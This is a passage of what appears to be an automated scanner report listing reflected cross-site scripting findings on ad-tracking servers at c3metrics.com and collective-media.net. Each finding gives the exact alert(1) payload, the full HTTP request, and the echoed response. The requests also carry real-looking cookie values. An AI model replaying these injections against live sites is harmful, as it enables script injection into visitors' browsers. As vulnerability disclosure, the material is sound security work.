Set-Cookie: 480fa2f0<script>alert(1)</script>b1f522a3374-VT=adver_05-02-2011-12-50-00_4343984361304340600; expires=Sat, 30-Apr-2016 12:50:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480fa2f0<script>alert(1)</script>b1f522a3374-nUID=adver_4343984361304340600; expires=Mon, 02-May-2011 13:05:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480fa2f0<script>alert(1)</script>b1f522a3374';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='4343984361304340600';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

6.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 192cc<script>alert(1)</script>0d7dd038fa4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver192cc<script>alert(1)</script>0d7dd038fa4&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver192cc%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d7dd038fa4_05-02-2011-12-49-58; expires=Thu, 05-May-2011 12:49:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver192cc%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d7dd038fa4_05-02-2011-12-49-58_15681511631304340598; expires=Sat, 30-Apr-2016 12:49:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver192cc%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d7dd038fa4_15681511631304340598; expires=Mon, 02-May-2011 13:04:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver192cc<script>alert(1)</script>0d7dd038fa4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='156815116313043
...[SNIP]...

6.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7a33<script>alert(1)</script>26cb5890d6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/e7a33<script>alert(1)</script>26cb5890d6c&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:16 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-16; expires=Thu, 05-May-2011 12:50:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-16_11597600871304340616; expires=Sat, 30-Apr-2016 12:50:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11597600871304340616; expires=Mon, 02-May-2011 13:05:16 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='11597600871304340616';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/e7a33<script>alert(1)</script>26cb5890d6c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

6.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 2133b<script>alert(1)</script>1241548eef4 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=2133b<script>alert(1)</script>1241548eef4&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-03; expires=Thu, 05-May-2011 12:50:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-03_15350602311304340603; expires=Sat, 30-Apr-2016 12:50:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15350602311304340603; expires=Mon, 02-May-2011 13:05:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15350602311304340603';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='2133b<script>alert(1)</script>1241548eef4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

6.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f7222<script>alert(1)</script>307d61967c was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72f7222<script>alert(1)</script>307d61967c&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:01 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-01; expires=Thu, 05-May-2011 12:50:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-01_17578607731304340601; expires=Sat, 30-Apr-2016 12:50:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17578607731304340601; expires=Mon, 02-May-2011 13:05:01 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17578607731304340601';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72f7222<script>alert(1)</script>307d61967c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

6.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d9e6d<script>alert(1)</script>e50c464bbef was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=d9e6d<script>alert(1)</script>e50c464bbef&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:50:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-50-04; expires=Thu, 05-May-2011 12:50:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-12-50-04_18223252631304340604; expires=Sat, 30-Apr-2016 12:50:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_18223252631304340604; expires=Mon, 02-May-2011 13:05:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='18223252631304340604';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='d9e6d<script>alert(1)</script>e50c464bbef';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

6.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 923f8<script>alert(1)</script>0bafb8900a2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480923f8<script>alert(1)</script>0bafb8900a2&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:50 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480923f8<script>alert(1)</script>0bafb8900a2&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

6.8. http://480-adver-view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload fe0cf<script>alert(1)</script>58e0387d345 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adverfe0cf<script>alert(1)</script>58e0387d345&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:49 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s7; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adverfe0cf<script>alert(1)</script>58e0387d345&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

6.9. http://480-adver-view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 65d60<script>alert(1)</script>95aa5c7e076 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=7265d60<script>alert(1)</script>95aa5c7e076 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=7265d60<script>alert(1)</script>95aa5c7e076&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

6.10. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c745b'-alert(1)-'4ace195dc06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcastc745b'-alert(1)-'4ace195dc06/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:58:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:50 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcastc745b'-alert(1)-'4ace195dc06/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(
...[SNIP]...

6.11. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5855b'-alert(1)-'ab23faff340 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros5855b'-alert(1)-'ab23faff340/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:59:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:18 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros5855b'-alert(1)-'ab23faff340/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.12. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4910a'-alert(1)-'28bda3ed599 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros/other4910a'-alert(1)-'28bda3ed599;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:59:33 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other4910a'-alert(1)-'28bda3ed599;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.13. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [anx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d284'-alert(1)-'03c000bc2e was submitted in the anx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738?6d284'-alert(1)-'03c000bc2e HTTP/1.1
